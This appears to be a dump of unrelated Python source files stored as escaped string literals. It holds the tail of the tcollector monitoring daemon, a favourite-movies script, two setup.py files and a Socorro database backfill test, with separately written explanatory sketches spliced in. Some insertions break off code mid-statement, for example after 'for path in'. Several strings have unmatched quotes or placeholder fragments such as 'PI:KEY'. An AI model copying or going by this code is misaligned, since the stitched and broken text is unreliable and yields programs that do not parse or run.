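# --- Standalone restatement of the splitHost() helper defined in main()
# above, including the bracketed-IPv6 form it accepts. DEFAULT_PORT is
# assumed to be 4242 (OpenTSDB's usual listening port) for this sketch.

DEFAULT_PORT = 4242

def split_host(hostport):
    if ':' in hostport:
        if hostport[0] == '[' and ']:' in hostport:   # e.g. "[::1]:5000"
            host, port = hostport.split(']:')
            return (host[1:], int(port))
        host, port = hostport.split(':')              # e.g. "tsd1:4242"
        return (host, int(port))
    return (hostport, DEFAULT_PORT)                   # bare hostname

assert split_host('[::1]:5000') == ('::1', 5000)
assert split_host('tsd1:4242') == ('tsd1', 4242)
assert split_host('tsd2') == ('tsd2', 4242)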
stdin_loop(options, modules, sender, tags):\n """"""The main loop of the program that runs when we are in stdin mode.""""""\n\n global ALIVE\n next_heartbeat = int(time.time() + 600)\n while ALIVE:\n time.sleep(15)\n reload_changed_config_modules(modules, options, sender, tags)\n now = int(time.time())\n if now >= next_heartbeat:\n LOG.info(\'Heartbeat (%d collectors running)\'\n % sum(1 for col in all_living_collectors()))\n next_heartbeat = now + 600\n\ndef main_loop(options, modules, sender, tags):\n """"""The main loop of the program that runs when we\'re not in stdin mode.""""""\n\n next_heartbeat = int(time.time() + 600)\n while ALIVE:\n populate_collectors(options.cdir)\n reload_changed_config_modules(modules, options, sender, tags)\n reap_children()\n check_children(options)\n spawn_children()\n time.sleep(15)\n now = int(time.time())\n if now >= next_heartbeat:\n LOG.info(\'Heartbeat (%d collectors running)\'\n % sum(1 for col in all_living_collectors()))\n next_heartbeat = now + 600\n\n\ndef list_config_modules(etcdir):\n """"""Returns an iterator that yields the name of all the config modules.""""""\n if not os.path.isdir(etcdir):\n return iter(()) # Empty iterator.\n return (name for name in os.listdir(etcdir)\n if (name.endswith(\'.py\')\n and os.path.isfile(os.path.join(etcdir, name))))\n\n\ndef load_etc_dir(options, tags):\n """"""Loads any Python module from tcollector\'s own \'etc\' directory.\n\n Returns: A dict of path -> (module, timestamp).\n """"""\n\n etcdir = os.path.join(options.cdir, \'etc\')\n sys.path.append(etcdir) # So we can import modules from the etc dir.\n modules = {} # path -> (module, timestamp)\n for name in list_config_modules(etcdir):\n path = os.path.join(etcdir, name)\n module = load_config_module(name, options, tags)\n modules[path] = (module, os.path.getmtime(path))\n return modules\n\n\ndef load_config_module(name, options, tags):\n """"""Imports the config module of the given name\n\n The \'name\' argument can be a string, in which case the module will be\n loaded by name, or it can be a module object, in which case the module\n will get reloaded.\n\n If the module has an \'onload\' function, calls it.\n Returns: the reference to the module loaded.\n """"""\n\n if isinstance(name, str):\n LOG.info(\'Loading %s\', name)\n d = {}\n # Strip the trailing .py\n module = __import__(name[:-3], d, d)\n else:\n module = reload(name)\n onload = module.__dict__.get(\'onload\')\n if callable(onload):\n try:\n onload(options, tags)\n except:\n LOG.fatal(\'Exception while loading %s\', name)\n raise\n return module\n\n\ndef reload_changed_config_modules(modules, options, sender, tags):\n """"""Reloads any changed modules from the \'etc\' directory.\n\n Args:\n cdir: The path to the \'collectors\' directory.\n modules: A dict of path -> (module, timestamp).\n Returns: whether or not anything has changed.\n """"""\n\n etcdir = os.path.join(options.cdir, \'etc\')\n current_modules = set(list_config_modules(etcdir))\n current_paths = set(os.path.join(etcdir, name)\n for name in current_modules)\n changed = False\n\n # Reload any module that has changed.\n for path, (module, timestamp) in modules.iteritems():\n if path not in current_paths: # Module was removed.\n continue\n mtime = os.path.getmtime(path)\n if mtime > timestamp:\n LOG.info(\'Reloading %s, file has changed\', path)\n module = load_config_module(module, options, tags)\n modules[path] = (module, mtime)\n changed = True\n\n # Remove any module that has been removed.\n for path in 
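# --- The mtime-based reload strategy used by reload_changed_config_modules()
# above, reduced to its core: remember (module, mtime) per path and reload
# only when the file on disk is newer. Python 3 sketch (importlib.reload
# replaces the Python 2 builtin reload() used above).

import importlib
import os

def reload_if_changed(modules):
    """modules: dict of path -> (module, mtime). Returns True if any reloaded."""
    changed = False
    for path, (module, mtime) in list(modules.items()):
        new_mtime = os.path.getmtime(path)
        if new_mtime > mtime:
            modules[path] = (importlib.reload(module), new_mtime)
            changed = True
    return changed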
set(modules).difference(current_paths):\n LOG.info(\'%s has been removed, tcollector should be restarted\', path)\n del modules[path]\n changed = True\n\n # Check for any modules that may have been added.\n for name in current_modules:\n path = os.path.join(etcdir, name)\n if path not in modules:\n module = load_config_module(name, options, tags)\n modules[path] = (module, os.path.getmtime(path))\n changed = True\n\n return changed\n\n\ndef write_pid(pidfile):\n """"""Write our pid to a pidfile.""""""\n f = open(pidfile, ""w"")\n try:\n f.write(str(os.getpid()))\n finally:\n f.close()\n\n\ndef all_collectors():\n """"""Generator to return all collectors.""""""\n\n return COLLECTORS.itervalues()\n\n\n# collectors that are not marked dead\ndef all_valid_collectors():\n """"""Generator to return all defined collectors that haven\'t been marked\n dead in the past hour, allowing temporarily broken collectors a\n chance at redemption.""""""\n\n now = int(time.time())\n for col in all_collectors():\n if not col.dead or (now - col.lastspawn > 3600):\n yield col\n\n\n# collectors that have a process attached (currenty alive)\ndef all_living_collectors():\n """"""Generator to return all defined collectors that have\n an active process.""""""\n\n for col in all_collectors():\n if col.proc is not None:\n yield col\n\n\ndef shutdown_signal(signum, frame):\n """"""Called when we get a signal and need to terminate.""""""\n LOG.warning(""shutting down, got signal %d"", signum)\n shutdown()\n\n\ndef kill(proc, signum=signal.SIGTERM):\n os.killpg(proc.pid, signum)\n\n\ndef shutdown():\n """"""Called by atexit and when we receive a signal, this ensures we properly\n terminate any outstanding children.""""""\n\n global ALIVE\n # prevent repeated calls\n if not ALIVE:\n return\n # notify threads of program termination\n ALIVE = False\n\n LOG.info(\'shutting down children\')\n\n # tell everyone to die\n for col in all_living_collectors():\n col.shutdown()\n\n LOG.info(\'exiting\')\n sys.exit(1)\n\n\ndef reap_children():\n """"""When a child process dies, we have to determine why it died and whether\n or not we need to restart it. This method manages that logic.""""""\n\n for col in all_living_collectors():\n now = int(time.time())\n # FIXME: this is not robust. the asyncproc module joins on the\n # reader threads when you wait if that process has died. this can cause\n # slow dying processes to hold up the main loop. good for now though.\n status = col.proc.poll()\n if status is None:\n continue\n col.proc = None\n\n # behavior based on status. 
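# --- The "redemption" rule inside all_valid_collectors() above, restated
# as a single predicate: a collector marked dead becomes spawnable again
# once a full hour has passed since its last spawn.

REDEMPTION_WINDOW = 3600  # seconds, matching the hard-coded value above

def is_valid_collector(col, now):
    return (not col.dead) or (now - col.lastspawn > REDEMPTION_WINDOW)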
a code 0 is normal termination, code 13\n # is used to indicate that we don\'t want to restart this collector.\n # any other status code is an error and is logged.\n if status == 13:\n LOG.info(\'removing %s from the list of collectors (by request)\',\n col.name)\n col.dead = True\n elif status != 0:\n LOG.warning(\'collector %s terminated after %d seconds with \'\n \'status code %d, marking dead\',\n col.name, now - col.lastspawn, status)\n col.dead = True\n else:\n register_collector(Collector(col.name, col.interval, col.filename,\n col.mtime, col.lastspawn))\n\ndef check_children(options):\n """"""When a child process hasn\'t received a datapoint in a while,\n assume it\'s died in some fashion and restart it.""""""\n\n for col in all_living_collectors():\n now = int(time.time())\n\n if col.last_datapoint < (now - options.allowed_inactivity_time):\n # It\'s too old, kill it\n LOG.warning(\'Terminating collector %s after %d seconds of inactivity\',\n col.name, now - col.last_datapoint)\n col.shutdown()\n if not options.remove_inactive_collectors:\n register_collector(Collector(col.name, col.interval, col.filename,\n col.mtime, col.lastspawn))\n\n\ndef set_nonblocking(fd):\n """"""Sets the given file descriptor to non-blocking mode.""""""\n fl = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK\n fcntl.fcntl(fd, fcntl.F_SETFL, fl)\n\n\ndef spawn_collector(col):\n """"""Takes a Collector object and creates a process for it.""""""\n\n LOG.info(\'%s (interval=%d) needs to be spawned\', col.name, col.interval)\n\n # FIXME: do custom integration of Python scripts into memory/threads\n # if re.search(\'\\.py$\', col.name) is not None:\n # ... load the py module directly instead of using a subprocess ...\n try:\n col.proc = subprocess.Popen(col.filename, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n close_fds=True,\n preexec_fn=os.setsid)\n except OSError, e:\n LOG.error(\'Failed to spawn collector %s: %s\' % (col.filename, e))\n return\n # The following line needs to move below this line because it is used in\n # other logic and it makes no sense to update the last spawn time if the\n # collector didn\'t actually start.\n col.lastspawn = int(time.time())\n set_nonblocking(col.proc.stdout.fileno())\n set_nonblocking(col.proc.stderr.fileno())\n if col.proc.pid > 0:\n col.dead = False\n LOG.info(\'spawned %s (pid=%d)\', col.name, col.proc.pid)\n return\n # FIXME: handle errors better\n LOG.error(\'failed to spawn collector: %s\', col.filename)\n\n\ndef spawn_children():\n """"""Iterates over our defined collectors and performs the logic to\n determine if we need to spawn, kill, or otherwise take some\n action on them.""""""\n\n if not ALIVE:\n return\n\n for col in all_valid_collectors():\n now = int(time.time())\n if col.interval == 0:\n if col.proc is None:\n spawn_collector(col)\n elif col.interval <= now - col.lastspawn:\n if col.proc is None:\n spawn_collector(col)\n continue\n\n # I\'m not very satisfied with this path. It seems fragile and\n # overly complex, maybe we should just reply on the asyncproc\n # terminate method, but that would make the main tcollector\n # block until it dies... 
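# --- Why set_nonblocking() above matters: spawn_collector() attaches pipes
# to the child's stdout/stderr, and a plain blocking read would stall the
# main loop whenever a collector had nothing to say. With O_NONBLOCK set,
# a read on an empty pipe raises BlockingIOError instead. Python 3 sketch:

import fcntl
import os

def read_available(fd):
    """Return whatever bytes are ready on fd, or b'' if none are."""
    fl = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
    try:
        return os.read(fd, 4096)
    except BlockingIOError:  # nothing buffered right now; don't wait
        return b''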
:|\n if col.nextkill > now:\n continue\n if col.killstate == 0:\n LOG.warning(\'warning: %s (interval=%d, pid=%d) overstayed \'\n \'its welcome, SIGTERM sent\',\n col.name, col.interval, col.proc.pid)\n kill(col.proc)\n col.nextkill = now + 5\n col.killstate = 1\n elif col.killstate == 1:\n LOG.error(\'error: %s (interval=%d, pid=%d) still not dead, \'\n \'SIGKILL sent\',\n col.name, col.interval, col.proc.pid)\n kill(col.proc, signal.SIGKILL)\n col.nextkill = now + 5\n col.killstate = 2\n else:\n LOG.error(\'error: %s (interval=%d, pid=%d) needs manual \'\n \'intervention to kill it\',\n col.name, col.interval, col.proc.pid)\n col.nextkill = now + 300\n\n\ndef populate_collectors(coldir):\n """"""Maintains our internal list of valid collectors. This walks the\n collector directory and looks for files. In subsequent calls, this\n also looks for changes to the files -- new, removed, or updated files,\n and takes the right action to bring the state of our running processes\n in line with the filesystem.""""""\n\n global GENERATION\n GENERATION += 1\n\n # get numerics from scriptdir, we\'re only setup to handle numeric paths\n # which define intervals for our monitoring scripts\n for interval in os.listdir(coldir):\n if not interval.isdigit():\n continue\n interval = int(interval)\n\n for colname in os.listdir(\'%s/%d\' % (coldir, interval)):\n if colname.startswith(\'.\'):\n continue\n\n filename = \'%s/%d/%s\' % (coldir, interval, colname)\n if os.path.isfile(filename) and os.access(filename, os.X_OK):\n mtime = os.path.getmtime(filename)\n\n # if this collector is already \'known\', then check if it\'s\n # been updated (new mtime) so we can kill off the old one\n # (but only if it\'s interval 0, else we\'ll just get\n # it next time it runs)\n if colname in COLLECTORS:\n col = COLLECTORS[colname]\n\n # if we get a dupe, then ignore the one we\'re trying to\n # add now. there is probably a more robust way of doing\n # this...\n if col.interval != interval:\n LOG.error(\'two collectors with the same name %s and \'\n \'different intervals %d and %d\',\n colname, interval, col.interval)\n continue\n\n # we have to increase the generation or we will kill\n # this script again\n col.generation = GENERATION\n if col.mtime < mtime:\n LOG.info(\'%s has been updated on disk\', col.name)\n col.mtime = mtime\n if not col.interval:\n col.shutdown()\n LOG.info(\'Respawning %s\', col.name)\n register_collector(Collector(colname, interval,\n filename, mtime))\n else:\n register_collector(Collector(colname, interval, filename,\n mtime))\n\n # now iterate over everybody and look for old generations\n to_delete = []\n for col in all_collectors():\n if col.generation < GENERATION:\n LOG.info(\'collector %s removed from the filesystem, forgetting\',\n col.name)\n col.shutdown()\n to_delete.append(col.name)\n for name in to_delete:\n del COLLECTORS[name]\n\n\nif __name__ == \'__main__\':\n sys.exit(main(sys.argv))\n', 'import media\nimport fav_movies_web\n\n# Instances of my favorite movies:\n\n# Deadpool movie: movie title, sotryline, poster image and movie trailer\ndeadpool = media.Movie(""Deadpool"",\n """""" Wade Wilson (Ryan Reynolds) is a former Special Forces\n operative who now works as a mercenary. His world comes\n crashing down when evil scientist Ajax (Ed Skrein)\n tortures, disfigures and transforms him into Deadpool.\n The rogue experiment leaves Deadpool with accelerated\n healing powers and a twisted sense of humor. 
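# --- The SIGTERM -> SIGKILL escalation in spawn_children() above, written
# as a small state table: killstate 0 = not yet warned, 1 = SIGTERM sent,
# 2 = SIGKILL sent (needs a human). Sketch of the same policy with its
# 5-second grace period between steps; kill_fn stands in for kill() above.

import signal

ESCALATION = {
    0: (signal.SIGTERM, 5, 1),   # first offence: ask politely
    1: (signal.SIGKILL, 5, 2),   # still alive: stop asking
}

def escalate(col, now, kill_fn):
    if col.nextkill > now:
        return                    # grace period not over yet
    step = ESCALATION.get(col.killstate)
    if step is None:
        col.nextkill = now + 300  # already SIGKILLed; re-log every 5 minutes
        return
    sig, grace, next_state = step
    kill_fn(col.proc, sig)
    col.nextkill = now + grace
    col.killstate = next_state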
With help\n from mutant allies Colossus and Negasonic Teenage\n Warhead (Brianna Hildebrand), Deadpool uses his new\n skills to hunt down the man who nearly destroyed\n his life."""""",\n ""https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=Xithigfg7dA""\n ) # NOQA\n\n# Focus movie: movie title, storyline, poster image and movie trailer\nfocus = media.Movie(""Focus"",\n """"""Nicky (Will Smith), a veteran con artist, takes a\n novice named Jess (Margot Robbie) under his wing. While\n Nicky teaches Jess the tricks of the trade, the pair\n become romantically involved; but, when Jess gets\n uncomfortably close, Nicky ends their relationship."""""",\n ""http://static.rogerebert.PI:KEY.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=MxCRgtdAuBo""\n ) # NOQA\n\n# Mechanic: Resurrection movie: movie title, storyline, poster image and\n# movie trailer\nmechanic = media.Movie(""Mechanic: Resurrection"",\n """"""Living under cover in Brazil, master assassin Arthur\n Bishop (Jason Statham) springs back into action after an\n old enemy (Sam Hazeldine) kidnaps the woman (Jessica Alba)\n he loves. To save her life, Bishop must kill an\n imprisoned African warlord, a human trafficker (Toby\n Eddington) and an arms dealer (Tommy Lee Jones), all\n while making the deaths look like accidents. When things\n don\'t go exactly as planned, Bishop turns the tables on\n the people who forced him out of retirement."""""",\n ""https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=G-P3f_wDXvs""\n ) # NOQA\n\n# Enemy movie: movie title, storyline, poster image and movie trailer\nenemy = media.Movie(""Enemy"",\n """"""A mild-mannered college professor (Jake Gyllenhaal)\n discovers a look-alike actor and delves into the other\n man\'s private affairs."""""",\n ""http://www.impawards.com/intl/misc/2014/posters/enemy.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=FJuaAWrgoUY""\n ) # NOQA\n\n# Wonder Woman movie: movie title, storyline, poster image and movie trailer\nwonder_woman = media.Movie(""Wonder Woman"",\n """"""Before she was Wonder Woman (Gal Gadot), she was\n Diana, princess of the Amazons, trained to be an\n unconquerable warrior. Raised on a sheltered island\n paradise, Diana meets an American pilot (Chris Pine)\n who tells her about the massive conflict that\'s\n raging in the outside world. Convinced that she can\n stop the threat, Diana leaves her home for the first\n time. Fighting alongside men in a war to end\n all wars, she finally discovers her full powers and\n true destiny."""""",\n ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=1Q8fG0TtVAY""\n ) # NOQA\n\n# Ghost in the Shell movie: movie title, storyline, poster image and movie\n# trailer\nghost_in_the_shell = media.Movie(""Ghost in the Shell"",\n """"""In the near future, Major is the first of\n her kind: a human who is cyber-enhanced to be a\n perfect soldier devoted to stopping the world\'s\n most dangerous criminals. When terrorism\n reaches a new level that includes the ability\n to hack into people\'s minds and control them,\n Major is uniquely qualified to stop it. As\n she prepares to face a new enemy, Major\n discovers that her life was stolen instead of\n saved. 
Now, she will stop at nothing to\n recover her past while punishing those who did\n this to her."""""",\n ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg"", # NOQA\n ""https://www.youtube.com/watch?v=G4VmJcZR0Yg""\n ) # NOQA\n\n# All instances grouped together in a list\n# The list is the set of movies that will be passed to the media file\nmovies = [\n deadpool,\n focus,\n mechanic,\n enemy, wonder_woman,\n ghost_in_the_shell\n]\n\n# Open the HTML file in a web browser via fav_movies_web.py\nfav_movies_web.open_movies_page(movies) # the array/list (argument)\n', ""#!/usr/bin/env python\n\nimport glob\nimport numpy as np\ntry:\n from setuptools import setup\n have_setuptools = True\nexcept ImportError:\n from distutils.core import setup\n have_setuptools = False\n\ntry:\n from Cython.Build import cythonize\n have_cython = True\nexcept ImportError:\n have_cython = False\n\nkwargs = {'name': 'openmc',\n 'version': '0.8.0',\n 'packages': ['openmc', 'openmc.data', 'openmc.mgxs', 'openmc.model',\n 'openmc.stats'],\n 'scripts': glob.glob('scripts/openmc-*'),\n\n # Metadata\n 'author': 'Will Boyd',\n 'author_email': dummy@email.com',\n 'description': 'OpenMC Python API',\n 'url': 'https://github.com/mit-crpg/openmc',\n 'classifiers': [\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering'\n ]}\n\nif have_setuptools:\n kwargs.update({\n # Required dependencies\n 'install_requires': ['six', 'numpy>=1.9', 'h5py', 'matplotlib'],\n\n # Optional dependencies\n 'extras_require': {\n 'decay': ['uncertainties'],\n 'pandas': ['pandas>=0.17.0'],\n 'sparse' : ['scipy'],\n 'vtk': ['vtk', 'silomesh'],\n 'validate': ['lxml']\n },\n\n # Data files\n 'package_data': {\n 'openmc.data': ['mass.mas12', 'fission_Q_data_endfb71.h5']\n },\n })\n\n# If Cython is present, add resonance reconstruction capability\nif have_cython:\n kwargs.update({\n 'ext_modules': cythonize('openmc/data/reconstruct.pyx'),\n 'include_dirs': [np.get_include()]\n })\n\nsetup(**kwargs)\n"", ""#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport codecs\nfrom setuptools import setup\n\n\ndef read(fname):\n file_path = os.path.join(os.path.dirname(__file__), fname)\n return codecs.open(file_path, encoding='utf-8').read()\n\n\nsetup(\n name='pytest-concurrent',\n version='0.2.2',\n author='James Wang, Reverb Chu',\n author_email='jamesw96@uw.edu, dummy@email.com',\n maintainer='James Wang, Reverb Chu',\n maintainer_email='jamesw96@uw.edu, dummy@email.com',\n license='MIT',\n url='https://github.com/reverbc/pytest-concurrent',\n description='Concurrently execute test cases with multithread'\n ', multiprocess and gevent',\n long_description=read('README.rst'),\n packages=['pytest_concurrent', 'pytest_concurrent.modes'],\n install_requires=[\n 'pytest>=3.1.1',\n 'psutil>=5.2.2'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Framework :: Pytest',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Testing',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Operating System 
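# --- The media.Movie constructor used by the movie instances above takes
# (title, storyline, poster_image_url, trailer_youtube_url). media.py is
# not included in this file, so the following is a hypothetical sketch of
# what such a class minimally looks like, not the project's actual code.

import webbrowser

class Movie(object):
    """Holds the four pieces of metadata the movie page generator needs."""

    def __init__(self, title, storyline, poster_image_url,
                 trailer_youtube_url):
        self.title = title
        self.storyline = storyline
        self.poster_image_url = poster_image_url
        self.trailer_youtube_url = trailer_youtube_url

    def show_trailer(self):
        webbrowser.open(self.trailer_youtube_url)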
:: OS Independent',\n 'License :: OSI Approved :: MIT License',\n ],\n entry_points={\n 'pytest11': [\n 'concurrent = pytest_concurrent.plugin',\n ],\n },\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n)\n"", '# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom .unittestbase import PostgreSQLTestCase\nfrom nose.plugins.attrib import attr\nfrom nose.tools import eq_, assert_raises\nimport datetime\n\nfrom socorro.external.postgresql.backfill import Backfill\nfrom socorro.external.postgresql import staticdata, fakedata\nfrom socorro.external import MissingArgumentError\nfrom socorro.lib import datetimeutil\n\n\n#==============================================================================\n@attr(integration=\'postgres\')\nclass TestBackfill(PostgreSQLTestCase):\n """"""Tests the calling of all backfill functions""""""\n\n #--------------------------------------------------------------------------\n def setUp(self):\n """""" Populate tables with fake data """"""\n super(TestBackfill, self).setUp()\n\n cursor = self.connection.cursor()\n\n self.tables = []\n\n for table in staticdata.tables + fakedata.tables:\n # staticdata has no concept of duration\n if table.__module__ == \'socorro.external.postgresql.staticdata\':\n table = table()\n else:\n table = table(days=1)\n table.releases = {\n \'WaterWolf\': {\n \'channels\': {\n \'Nightly\': {\n \'versions\': [{\n \'number\': \'18.0\',\n \'probability\': 0.5,\n \'buildid\': \'%s000020\'\n }],\n \'adu\': \'10\',\n \'repository\': \'nightly\',\n \'throttle\': \'1\',\n \'update_channel\': \'nightly\',\n },\n },\n \'crashes_per_hour\': \'5\',\n \'guid\': dummy@email.com\'\n },\n \'B2G\': {\n \'channels\': {\n \'Nightly\': {\n \'versions\': [{\n \'number\': \'18.0\',\n \'probability\': 0.5,\n \'buildid\': \'%s000020\'\n }],\n \'adu\': \'10\',\n \'repository\': \'nightly\',\n \'throttle\': \'1\',\n \'update_channel\': \'nightly\',\n },\n },\n \'crashes_per_hour\': \'5\',\n \'guid\': dummy@email.com\'\n }\n }\n\n\n table_name = table.table\n table_columns = table.columns\n values = str(tuple([""%("" + i + "")s"" for i in table_columns]))\n columns = str(tuple(table_columns))\n self.tables.append(table_name)\n\n # TODO: backfill_reports_clean() sometimes tries to insert a\n # os_version_id that already exists\n if table_name is not ""os_versions"":\n for rows in table.generate_rows():\n data = dict(zip(table_columns, rows))\n query = ""INSERT INTO %(table)s "" % {\'table\': table_name}\n query = query + columns.replace(""\'"", """").replace("",)"", "")"")\n query = query + "" VALUES ""\n query = query + values.replace("",)"", "")"").replace(""\'"", """")\n\n cursor.execute(query, data)\n self.connection.commit()\n\n #--------------------------------------------------------------------------\n def tearDown(self):\n """""" Cleanup the database, delete tables and functions """"""\n\n cursor = self.connection.cursor()\n tables = str(self.tables).replace(""["", """").replace(""]"", """")\n cursor.execute(""TRUNCATE "" + tables.replace(""\'"", """") + "" CASCADE;"")\n\n self.connection.commit()\n self.connection.close()\n\n super(TestBackfill, self).tearDown()\n\n #--------------------------------------------------------------------------\n def setup_data(self):\n\n self.now = datetimeutil.utc_now()\n now = self.now.date()\n yesterday = now - datetime.timedelta(days=1)\n lastweek = now - 
datetime.timedelta(days=7)\n now_str = datetimeutil.date_to_string(now)\n yesterday_str = datetimeutil.date_to_string(yesterday)\n lastweek_str = datetimeutil.date_to_string(lastweek)\n\n self.test_source_data = {\n # Test backfill_adu\n \'adu\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_all_dups\n \'all_dups\': {\n \'params\': {\n ""start_date"": yesterday_str,\n ""end_date"": now_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_build_adu\n \'build_adu\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_correlations\n \'correlations\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_crashes_by_user_build\n \'crashes_by_user_build\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_crashes_by_user\n \'crashes_by_user\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n\n # TODO: Test backfill_daily_crashes tries to insert into a table\n # that do not exists. It can be fixed by creating a temporary one.\n #\'daily_crashes\': {\n # \'params\': {\n # ""update_day"": now_str,\n # },\n # \'res_expected\': [(True,)],\n # },\n\n # Test backfill_exploitability\n \'exploitability\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_explosiveness\n \'explosiveness\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_home_page_graph_build\n \'home_page_graph_build\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_home_page_graph\n \'home_page_graph\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_matviews\n \'matviews\': {\n \'params\': {\n ""start_date"": yesterday_str,\n ""reports_clean"": \'false\',\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_nightly_builds\n \'nightly_builds\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_rank_compare\n \'rank_compare\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_reports_clean\n \'reports_clean\': {\n \'params\': {\n ""start_date"": yesterday_str,\n ""end_date"": now_str,\n },\n \'res_expected\': [(True,)],\n },\n\n # TODO: Test backfill_reports_duplicates tries to insert into a\n # table that do not exists. 
It can be fixed by using the update\n # function inside of the backfill.\n #\'reports_duplicates\': {\n # \'params\': {\n # ""start_date"": yesterday_str,\n # ""end_date"": now_str,\n # },\n # \'res_expected\': [(True,)],\n # },\n\n # TODO: Test backfill_signature_counts tries to insert into\n # tables and to update functions that does not exist.\n #\'signature_counts\': {\n # \'params\': {\n # ""start_date"": yesterday_str,\n # ""end_date"": now_str,\n # },\n # \'res_expected\': [(True,)],\n # },\n\n # Test backfill_tcbs_build\n \'tcbs_build\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_tcbs\n \'tcbs\': {\n \'params\': {\n ""update_day"": yesterday_str,\n },\n \'res_expected\': [(True,)],\n },\n # Test backfill_weekly_report_partitions\n \'weekly_report_partitions\': {\n \'params\': {\n ""start_date"": lastweek_str,\n ""end_date"": now_str,\n ""table_name"": \'raw_crashes\',\n },\n \'res_expected\': [(True,)],\n },\n # TODO: Update Backfill to support signature_summary backfill\n # through the API\n #\'signature_summary_products\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_installations\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_uptime\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_os\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_process_type\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_architecture\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_flash_version\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_device\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n #\'signature_summary_graphics\': {\n # \'params\': {\n # ""update_day"": yesterday_str,\n # },\n # \'res_expected\': [(True,)],\n #},\n }\n\n #--------------------------------------------------------------------------\n def test_get(self):\n\n backfill = Backfill(config=self.config)\n\n #......................................................................\n # Test raise error if kind of backfill is not passed\n params = {""backfill_type"": \'\'}\n assert_raises(MissingArgumentError, backfill.get, **params)\n\n #......................................................................\n # Test all the backfill functions\n self.setup_data()\n for test, data in self.test_source_data.items():\n data[\'params\'][\'backfill_type\'] = str(test)\n res = backfill.get(**data[\'params\'])\n eq_(res[0], data[\'res_expected\'][0])\n', '# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright (c) 2015, Nicolas P. Rougier\n# Distributed under the (new) BSD License.\n#\n# Contributors: Nicolas P. 
